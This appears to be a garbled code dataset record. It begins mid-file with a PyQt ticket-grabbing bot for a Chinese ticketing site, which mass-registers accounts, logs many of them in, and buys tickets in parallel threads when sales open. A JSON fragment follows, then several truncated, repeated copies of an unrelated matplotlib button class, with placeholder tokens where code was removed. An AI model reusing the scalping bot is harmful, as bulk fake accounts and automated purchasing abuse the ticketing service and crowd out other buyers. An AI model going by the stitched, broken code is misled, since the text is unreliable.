self.label_6.setObjectName(\"label_6\")\n\n self.label_7 = QtWidgets.QLabel(self.tab_2)\n self.label_7.setGeometry(QtCore.QRect(500, 40, 54, 12))\n self.label_7.setObjectName(\"label_7\")\n self.label_7.setStyleSheet(\"font-size:16px;color:red\") # 设置字体颜色\n\n self.label_8 = QtWidgets.QLabel(self.tab_2)\n self.label_8.setGeometry(QtCore.QRect(300, 130, 100, 12))\n self.label_8.setObjectName(\"label_8\")\n\n self.lineEdit_8 = QtWidgets.QLineEdit(self.tab_2)\n self.lineEdit_8.setGeometry(QtCore.QRect(415, 122, 51, 27))\n self.lineEdit_8.setObjectName(\"lineEdit_8\")\n self.lineEdit_8.setText('4')\n\n # 购买按钮 当所有条件选择完之后点击\n self.pushButton_3 = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_3.setGeometry(QtCore.QRect(30, 160, 54, 31))\n self.pushButton_3.setObjectName(\"pushButton_3\")\n self.pushButton_3.clicked.connect(self.search_2)\n\n # 退出程序按钮\n self.pushButton_quit = QtWidgets.QPushButton(self.tab_2)\n self.pushButton_quit.setGeometry(QtCore.QRect(460, 160, 54, 31))\n self.pushButton_quit.setObjectName(\"pushButton_quit\")\n self.pushButton_quit.clicked.connect(self.exit_quit)\n\n self.label_4 = QtWidgets.QLabel(self.tab_2)\n self.label_4.setGeometry(QtCore.QRect(30, 210, 54, 12))\n self.label_4.setObjectName(\"label_4\")\n\n # 购买日志输出\n self.textBrowser_1 = QtWidgets.QTextBrowser(self.tab_2)\n self.textBrowser_1.setGeometry(QtCore.QRect(30, 230, 521, 192))\n self.textBrowser_1.setObjectName(\"textBrowser\")\n # 添加显示数据\n # self.textBrowser_1.append('购买日志')\n\n # 抢票中心页面\n self.tabWidget.addTab(self.tab_2, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n # 账号注册页面\n self.tabWidget.addTab(self.tab_3, \"\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n # 点击注册按钮\n self.pushButton_4 = QtWidgets.QPushButton(self.tab_3)\n self.pushButton_4.setGeometry(QtCore.QRect(200, 110, 120, 30))\n self.pushButton_4.setObjectName(\"pushButton\")\n\n # 注册个数输入框\n self.lineEdit_tab3 = QtWidgets.QLineEdit(self.tab_3)\n self.lineEdit_tab3.setGeometry(QtCore.QRect(318, 111, 120, 28))\n self.lineEdit_tab3.setPlaceholderText(\" 请输入注册个数\")\n\n # 注册日志输出\n self.textBrowser_3 = QtWidgets.QTextBrowser(self.tab_3)\n self.textBrowser_3.setGeometry(QtCore.QRect(30, 200, 561, 221))\n self.textBrowser_3.setObjectName(\"textBrowser_3\")\n\n self.label_5 = QtWidgets.QLabel(self.tab_3)\n self.label_5.setGeometry(QtCore.QRect(30, 180, 54, 12))\n self.label_5.setObjectName(\"label_5\")\n\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"城市售票网-抢票\"))\n self.pushButton.setText(_translate(\"MainWindow\", \"点击登录\"))\n self.pushButton.clicked.connect(self.login)\n self.pushButton_4.clicked.connect(self.register)\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate(\"MainWindow\", \"账号登录\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate(\"MainWindow\", \"抢购中心\"))\n self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_3), _translate(\"MainWindow\", \"账号注册\"))\n self.label_0.setText(_translate(\"MainWindow\", \"登录日志:\"))\n self.pushButton_2.setText(_translate(\"MainWindow\", \"搜索名称\"))\n self.pushButton_3.setText(_translate(\"MainWindow\", \"点击购买\"))\n self.pushButton_quit.setText(_translate(\"MainWindow\", \"退出程序\"))\n self.pushButton_4.setText(_translate(\"MainWindow\", \"点击注册\"))\n self.label.setText(_translate(\"MainWindow\", \"已择场次:\"))\n self.label_2.setText(_translate(\"MainWindow\", \"已择价格:\"))\n self.label_3.setText(_translate(\"MainWindow\", \"购买总数量:\"))\n self.label_4.setText(_translate(\"MainWindow\", \"购买日志:\"))\n self.label_5.setText(_translate(\"MainWindow\", \"注册日志:\"))\n self.label_6.setText(_translate(\"MainWindow\", \"已购买:\"))\n self.label_7.setText(_translate(\"MainWindow\", \"0\"))\n self.label_8.setText(_translate(\"MainWindow\", \"每个账号购买数量:\"))\n self.textBrowser_3.setText(\"\")\n self.textBrowser_2.setText(\"\")\n self.textBrowser_1.setText(\"\")\n\n self.tabWidget.setCurrentIndex(0)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n\n # 点击登录执行\n def login(self):\n try:\n regiterSum = int(self.lineEdit_tab.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) # 提示框\n return\n ipList = [\"\"]\n # ipList = request_tickets_spider.get_ip_list(10)\n self.textBrowser_2.append(\"开始登陆,请等待...\")\n userinfo_list = []\n with open('infomation.txt', 'rt', encoding='utf-8') as f:\n info_record = re.findall(\"'loginId': '(.*?)'\", f.read())\n for loginId in info_record:\n userinfo_list.append(loginId)\n # 多线程\n for thr in userinfo_list[:regiterSum]:\n grabber = BuyUrbtix()\n ip = random.choice(ipList)\n Thread_name = Thread(target=grabber.openSite, args=(thr,ip))\n self.threads.append(Thread_name)\n Thread_name.setDaemon(True)\n Thread_name.start()\n\n # 点击搜索按钮执行\n def search_1(self):\n keyword = self.lineEdit.text()\n self.textBrowser_1.append(\"正在查询 %s 的所有场次和价格...\" % keyword)\n if keyword == self.keywordJudge:\n self.textBrowser_1.append(\"请等待...\")\n self.keywordJudge = ''\n return\n self.keywordJudge = keyword\n Thread_name = Thread(target=self.refresh)\n self.threads.append(Thread_name)\n Thread_name.start()\n\n Thread_01 = Thread(target=self.show_session_data)\n self.threads.append(Thread_01)\n Thread_01.start()\n\n\n # 把选择的场次和价格显示到主界面\n def show_session_data(self):\n global SHOW_S_P\n self.comboBox_2.clear()\n self.comboBox.clear()\n while True:\n # if self.ex.sessionName and self.ex.sessionPrice:\n if ex.sessionName and ex.sessionPrice and SHOW_S_P:\n for i,eventDateName in enumerate(ex.sessionName):\n self.comboBox_2.addItem(eventDateName, i)\n for i,price in enumerate(ex.sessionPrice):\n self.comboBox.addItem(str(price), i)# 价格\n self.comboBox.setCurrentIndex(0)\n self.comboBox_2.setCurrentIndex(0)\n ex.sessionName.clear()\n ex.sessionPrice.clear()\n SHOW_S_P = False\n time.sleep(0.2)\n\n # 把信息刷新到界面\n def refresh(self):\n try:\n if self.lineEdit.text():\n global eventDateList\n keyword = self.lineEdit.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n ex.eventDateList = request_spider.get_date_url(keyword)\n if ex.eventDateList:\n self.textBrowser_1.append(\"查询成功,请在选择界面选择场次和价格...\")\n global SESSION_DATA\n SESSION_DATA = True\n # ex.create_c()\n else:\n self.textBrowser_1.append(\"查询失败,请确定您查询的节目存在...\")\n else:\n sys.exit()\n except Exception as err:\n self.textBrowser_1.append(\"查询失败,请确定您查询的节目存在...\")\n print(err)\n sys.exit()\n\n # 日志更新\n def output_login_status(self):\n # 登录成功输出\n while True:\n # 登陆日志\n login_record_list = login_record()\n if login_record_list:\n for i in login_record_list:\n self.textBrowser_2.append(i)\n self.textBrowser_2.moveCursor(self.textBrowser_2.textCursor().End)\n login_record_list.remove(i)\n time.sleep(0.1)\n\n # 购买日志\n def output_buy_record(self):\n while True:\n buy_record_list = buy_record()\n if buy_record_list:\n for record in buy_record_list:\n if \"购买成功\" in record:\n self.buy_succeed_count += 1\n self.label_7.setText(str(self.buy_succeed_count))\n self.textBrowser_1.append(record)\n self.textBrowser_1.moveCursor(self.textBrowser_1.textCursor().End)\n buy_record_list.remove(record)\n time.sleep(0.1)\n\n # 注册日志\n def output_register_record(self):\n while True:\n register_record_list = register_record()\n if register_record_list:\n for i in register_record_list:\n self.textBrowser_3.append(i)\n self.textBrowser_3.moveCursor(self.textBrowser_3.textCursor().End)\n register_record_list.remove(i)\n time.sleep(0.1)\n\n\n # 购买条件选择后点击执行\n def search_2(self):\n if not self.lineEdit_1.text():\n self.textBrowser_1.append(\"请输入购买总数量...\")\n return\n\n if my_attr['selNum'] and my_attr['selPrice'] and my_attr['selSeatUrl']:\n self.textBrowser_1.append(\"正在购买,请等待...\")\n return\n\n if ex.saleTime:\n Thread_name = Thread(target=self.wait_sale)\n Thread_name.setDaemon(True)\n Thread_name.start()\n return\n\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append(\"开始购买,请您耐心等待...\")\n\n def wait_sale(self):\n dateList = ex.saleTime\n print(\"%s年%s月%s日%s时开始售票,等待购买!\" % tuple(dateList))\n self.textBrowser_1.append(\"%s年%s月%s日%s时开始售票,等待购买!\" % tuple(dateList))\n while True:\n saleTimestamp = int(time.mktime(time.strptime(''.join(dateList) + '0000', \"%Y%m%d%H%M%S\")))\n if saleTimestamp <= int(time.time()):\n print(\"%s年%s月%s日%s时开始售票,开始购买!\" % tuple(dateList))\n self.textBrowser_1.append(\"%s年%s月%s日%s时开始售票,开始购买!\" % tuple(dateList))\n break\n time.sleep(1)\n\n my_attr['gross'] = self.lineEdit_1.text()\n my_attr['selNum'] = self.lineEdit_8.text()\n my_attr['selPrice'] = ex.eventPrice\n my_attr['selSeatUrl'] = ex.eventUrl\n self.textBrowser_1.append(\"开始购买,请您耐心等待...\")\n\n\n #点击注册执行并打印注册 \n def register(self):\n self.textBrowser_3.append(\"开始注册,请等待...\")\n try:\n regiterSum = int(self.lineEdit_tab3.text())\n except Exception as err:\n res = QMessageBox.question(self, '提示', '请输入正整数!', QMessageBox.Ok) # 提示框\n return\n threads = []\n for _ in range(regiterSum):\n uper = Register()\n Thread_name = Thread(target=uper.registerInfo)\n Thread_name.setDaemon(True)\n Thread_name.start()\n threads.append(Thread_name)\n\n # 退出程序\n def exit_quit(self):\n global EXIT_COND\n res = QMessageBox.question(self, '提示', '您确定要退出程序吗!', QMessageBox.Yes | QMessageBox.No) # 提示框\n if res == QMessageBox.Yes:\n self._thread.exit_thread()\n time.sleep(1)\n sys.exit()\n else:\n pass\n\n\nclass Example(QMainWindow):\n sessionList = []\n priceList = []\n sessionListEvn = []\n priceListEvn = []\n eventDateList = []\n eventUrl = []\n eventPrice = []\n sessionName = []\n sessionPrice = []\n saleTime = []\n buyNum = 1\n\n def __init__(self):\n super(QMainWindow, self).__init__()\n self.setWindowTitle('城市售票网') # 主窗口\n self.resize(680, 800)\n # 取消最大化\n self.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)\n # 固定窗口大小\n self.setFixedSize(self.width(), self.height())\n\n self.w = QWidget()\n self.w.setFixedWidth(680)\n self.w.setFixedHeight(540)\n\n self.setCentralWidget(self.w)\n self.topFiller = QWidget()\n # 把布局放入到 w 窗口\n # 创建一个滚动条\n self.scroll = QScrollArea()\n self.scroll.setWidget(self.topFiller) # 滚动条放self.topFiller\n\n self.vbox = QVBoxLayout() # 方框布局\n self.vbox.addWidget(self.scroll) # 滚动条放入布局\n self.w.setLayout(self.vbox)\n\n self.initUI()\n\n def closeEvent(self, QCloseEvent):\n res = QMessageBox.question(self,'提示','您确定选择无误吗?',QMessageBox.Yes|QMessageBox.No,QMessageBox.No) #两个按钮是否, 默认No则关闭这个提示框\n if res == QMessageBox.Yes:\n global SHOW_S_P\n SHOW_S_P = True\n QCloseEvent.accept()\n self.cb1.setChecked(False)\n self.cb2.setChecked(False)\n else:\n QCloseEvent.ignore()\n\n def initUI(self):\n #新建全选复选框对象\n self.cb1 = QCheckBox('全选',self.topFiller)\n self.cb1.move(20,30)\n self.cb2 = QCheckBox('全选',self)\n self.cb2.move(20, 570)\n # 创建按钮\n bt1 = QPushButton('确定',self)\n bt2 = QPushButton('刷新',self)\n\n bt1.move(20,760)\n bt2.move(120,760)\n\n # 每当复选框的状态改变时,即每当用户选中或取消选中该信号时,就会发出此信号。\n # 所以当产生此信号的时候,我们将其连接相应的槽函数。\n self.cb1.stateChanged.connect(self.changecb1) # 全选复选框连接到全选槽函数\n self.cb2.stateChanged.connect(self.changecb2) # 全选复选框连接到全选槽函数\n bt1.clicked.connect(self.pitch_on) # 连接到显示选中单元\n bt2.clicked.connect(self.create_c) # 连接到创建函数\n\n def create_c(self):\n if self.eventDateList:\n self.sessionList = [eventDateName['eventDateName'] for eventDateName in self.eventDateList]\n self.priceList = [price for price in self.eventDateList[0]['priceList']]\n # print(self.priceList)\n # print(self.sessionList)\n ex.show()\n else:\n ex.show()\n QMessageBox.question(self, '提示', '搜索内容不存在!', QMessageBox.Ok)\n return\n\n # 清空上次搜索内容\n if self.sessionListEvn and self.priceListEvn:\n for s_evn in self.sessionListEvn:\n s_evn.deleteLater()\n for p_evn in self.priceListEvn:\n p_evn.deleteLater()\n\n self.sessionListEvn.clear()\n self.priceListEvn.clear()\n self.eventPrice.clear()\n self.eventUrl.clear()\n\n # 场次信息显示\n for i,item in enumerate(self.sessionList):\n cb = QCheckBox(item, self.topFiller)\n cb.move(30, 60+30*i)\n self.sessionListEvn.append(cb)\n cb.show()\n self.topFiller.setMinimumSize(580,(len(self.sessionList)+5)*30) #设置滚动条的尺寸\n\n # 价格显示\n for i,item in enumerate(self.priceList):\n cb_1 = QCheckBox(str(item), self)\n if i % 2 == 0:\n i = i // 2 + 1\n cb_1.move(30, 570+30*i)\n else:\n i = i // 2 + 1\n cb_1.move(330, 570+30*i)\n self.priceListEvn.append(cb_1)\n cb_1.show()\n\n def pitch_on(self):\n if self.sessionList:\n for i in self.sessionListEvn: # 遍历所有复选框\n if i.isChecked(): # 判断是否被选中\n for eventDate in self.eventDateList: # 遍历所有的数据\n if eventDate['eventDateName'] == i.text(): # 判断数据是否被选中\n if 'saleDate' in eventDate:\n self.saleTime = eventDate['saleDate']\n # print(eventDate['saleDate'])\n self.eventUrl.append(eventDate[\"eventUrl\"]) # 被选中则保存\n self.sessionName.append(eventDate['eventDateName'])\n\n for i in self.priceListEvn:\n if i.isChecked():\n if i.text() in self.eventDateList[0]['priceList']:\n self.eventPrice.append(str(self.eventDateList[0]['priceList'].index(i.text())))\n self.sessionPrice.append(i.text())\n\n # 如果选择的有数据,则关闭窗口,没有数据,提示选择数据\n if self.eventPrice and self.eventUrl:\n self.close()\n else:\n res = QMessageBox.question(self, '提示', '您没有选择或价格场次,确定退出吗?', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No) # 两个按钮是否, 默认No则关闭这个提示框\n if res == QMessageBox.Yes:\n self.close()\n else:\n print(\"输入内容不存在!\")\n\n # 全选复选框槽函数\n def changecb1(self):\n if self.cb1.checkState() == Qt.Checked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(True)\n elif self.cb1.checkState() == Qt.Unchecked:\n for qcb in self.sessionListEvn:\n qcb.setChecked(False)\n\n # 全选复选框槽函数\n def changecb2(self):\n if self.cb2.checkState() == Qt.Checked:\n for qcb in self.priceListEvn:\n qcb.setChecked(True)\n elif self.cb2.checkState() == Qt.Unchecked:\n for qcb in self.priceListEvn:\n qcb.setChecked(False)\n\n # 刷新按钮\n def refresh_cb(self):\n while True:\n if self.sessionList and self.priceList:\n self.create_c()\n break\n time.sleep(0.2)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv) # 创建一个QApplication,也就是你要开发的软件app\n ex = Example()\n MainWindow = QtWidgets.QMainWindow() # 创建一个QMainWindow,用来装载你需要的各种组件、控件\n ui = Ui_MainWindow() # ui是你创建的ui类的实例化对象\n ui.setupUi(MainWindow) # 执行类中的setupUi方法,方法的参数是第二步中创建的QMainWindow\n MainWindow.show() # 执行QMainWindow的show()方法,显示这个QMainWindow\n # ex.show()\n sys.exit(app.exec_())\n\n",
"step-ids": [
25,
26,
30,
32,
33
]
}
|
[
25,
26,
30,
32,
33
] |
<|reserved_special_token_0|>
class Add_Buttons(object):
<|reserved_special_token_0|>
def validate_inputs(self):
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError('Button params must be a dictionary')
if len(self.button_labels) < 1:
raise ValueError(
"'button_labels' Must have at least one button label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError(
"'button_actions' must be the same length as 'button_labels")
self.num_buttons = len(self.button_labels)
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = 'supported. \n Currently supported actions are: \n'
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval, maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue, minvalue
=minval, maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
<|reserved_special_token_0|>
def button_region(self, event):
if len(self.regions) == 0:
return None
x, y = event.x, event.y
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
for r, rn in enumerate(self.regions):
rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width,
(rn[1] + rn[3]) * height]
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Add_Buttons(object):
def __init__(self, ax=None, **kwargs):
"""
Adds a select rectangle feature to any matplotlib axis, with select,
clear all, and finish buttons
:param ax: matplotlib axis, the frame to add the selector to
:param kwargs: kwargs passed to the rectangle selector
Current allowed kwargs are:
button_labels - list of strings
defines the name of each button to be displayed
Must be of length 1 or greater
button_actions - list of strings
defines the action of each button. Must be same
length as button_labels
currently supported actions are:
"NEXT" - sends a return statement to move to
next plot
self.result set to 1
"PREVIOUS" - sends a return statement to move to
previous plot
self.result set to -1
"CLOSE" - closes the plot
"OPTION" - sends the button_label string
self.result set to button_label
"UINPUT" - asks user for an input
button_params - list of dictionaries (optional)
if defined must be same length as button_labels
a dictionary for each button
keywords of each dictionary:
"close" - when used with "OPTION" action will
close the plot after OPTION is clicked
"""
self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=
self.end, OPTION=self.option, UINPUT=self.uinput)
self.supported_actions = list(self.actions.keys())
self.buttons = []
self.regions = []
self.result = 0
self.data = dict()
if ax is None:
self.ax = plt.gca()
else:
self.ax = ax
if kwargs is None:
kwargs = dict()
self.button_labels = kwargs.get('button_labels', ['Close'])
self.num_buttons = len(self.button_labels)
self.button_actions = kwargs.get('button_actions', ['CLOSE'])
dparams = [dict()] * self.num_buttons
self.button_params = kwargs.get('button_params', dparams)
self.validate_inputs()
self.create_buttons()
def validate_inputs(self):
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError('Button params must be a dictionary')
if len(self.button_labels) < 1:
raise ValueError(
"'button_labels' Must have at least one button label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError(
"'button_actions' must be the same length as 'button_labels")
self.num_buttons = len(self.button_labels)
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = 'supported. \n Currently supported actions are: \n'
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval, maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue, minvalue
=minval, maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
def end(self, event):
"""
Event for clicking the finish button - closes the graph
:param event: event passed to function
:return:
"""
plt.close()
def button_region(self, event):
if len(self.regions) == 0:
return None
x, y = event.x, event.y
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
for r, rn in enumerate(self.regions):
rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width,
(rn[1] + rn[3]) * height]
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Add_Buttons(object):
def __init__(self, ax=None, **kwargs):
"""
Adds a select rectangle feature to any matplotlib axis, with select,
clear all, and finish buttons
:param ax: matplotlib axis, the frame to add the selector to
:param kwargs: kwargs passed to the rectangle selector
Current allowed kwargs are:
button_labels - list of strings
defines the name of each button to be displayed
Must be of length 1 or greater
button_actions - list of strings
defines the action of each button. Must be same
length as button_labels
currently supported actions are:
"NEXT" - sends a return statement to move to
next plot
self.result set to 1
"PREVIOUS" - sends a return statement to move to
previous plot
self.result set to -1
"CLOSE" - closes the plot
"OPTION" - sends the button_label string
self.result set to button_label
"UINPUT" - asks user for an input
button_params - list of dictionaries (optional)
if defined must be same length as button_labels
a dictionary for each button
keywords of each dictionary:
"close" - when used with "OPTION" action will
close the plot after OPTION is clicked
"""
self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=
self.end, OPTION=self.option, UINPUT=self.uinput)
self.supported_actions = list(self.actions.keys())
self.buttons = []
self.regions = []
self.result = 0
self.data = dict()
if ax is None:
self.ax = plt.gca()
else:
self.ax = ax
if kwargs is None:
kwargs = dict()
self.button_labels = kwargs.get('button_labels', ['Close'])
self.num_buttons = len(self.button_labels)
self.button_actions = kwargs.get('button_actions', ['CLOSE'])
dparams = [dict()] * self.num_buttons
self.button_params = kwargs.get('button_params', dparams)
self.validate_inputs()
self.create_buttons()
def validate_inputs(self):
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError('Button params must be a dictionary')
if len(self.button_labels) < 1:
raise ValueError(
"'button_labels' Must have at least one button label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError(
"'button_actions' must be the same length as 'button_labels")
self.num_buttons = len(self.button_labels)
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = 'supported. \n Currently supported actions are: \n'
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
def create_buttons(self, width=0.2):
"""
Create a set of buttons along the bottom axis of the figure
Need to re-write this to be generic based on used input
(might not be possible as user need to define events)
:param N: int, Number of buttons, default 3
:param width: float, width of the buttons in x, must be less than
1.0/N
:return:
"""
b_N, b_length = self.num_buttons, width
b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)
for b in range(b_N):
start = (b + 1) * b_sep + b * b_length
r = [start, 0.05, b_length, 0.075]
self.regions.append(r)
plt.subplots_adjust(bottom=0.25)
for b in range(b_N):
axbutton = plt.axes(self.regions[b])
button = Button(axbutton, self.button_labels[b])
button.on_clicked(self.actions[self.button_actions[b]])
self.buttons.append(button)
<|reserved_special_token_0|>
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval, maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue, minvalue
=minval, maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
def end(self, event):
"""
Event for clicking the finish button - closes the graph
:param event: event passed to function
:return:
"""
plt.close()
def button_region(self, event):
if len(self.regions) == 0:
return None
x, y = event.x, event.y
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
for r, rn in enumerate(self.regions):
rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width,
(rn[1] + rn[3]) * height]
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Add_Buttons(object):
def __init__(self, ax=None, **kwargs):
"""
Adds a select rectangle feature to any matplotlib axis, with select,
clear all, and finish buttons
:param ax: matplotlib axis, the frame to add the selector to
:param kwargs: kwargs passed to the rectangle selector
Current allowed kwargs are:
button_labels - list of strings
defines the name of each button to be displayed
Must be of length 1 or greater
button_actions - list of strings
defines the action of each button. Must be same
length as button_labels
currently supported actions are:
"NEXT" - sends a return statement to move to
next plot
self.result set to 1
"PREVIOUS" - sends a return statement to move to
previous plot
self.result set to -1
"CLOSE" - closes the plot
"OPTION" - sends the button_label string
self.result set to button_label
"UINPUT" - asks user for an input
button_params - list of dictionaries (optional)
if defined must be same length as button_labels
a dictionary for each button
keywords of each dictionary:
"close" - when used with "OPTION" action will
close the plot after OPTION is clicked
"""
self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=
self.end, OPTION=self.option, UINPUT=self.uinput)
self.supported_actions = list(self.actions.keys())
self.buttons = []
self.regions = []
self.result = 0
self.data = dict()
if ax is None:
self.ax = plt.gca()
else:
self.ax = ax
if kwargs is None:
kwargs = dict()
self.button_labels = kwargs.get('button_labels', ['Close'])
self.num_buttons = len(self.button_labels)
self.button_actions = kwargs.get('button_actions', ['CLOSE'])
dparams = [dict()] * self.num_buttons
self.button_params = kwargs.get('button_params', dparams)
self.validate_inputs()
self.create_buttons()
def validate_inputs(self):
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError('Button labels must be a list of strings')
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError('Button params must be a dictionary')
if len(self.button_labels) < 1:
raise ValueError(
"'button_labels' Must have at least one button label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError(
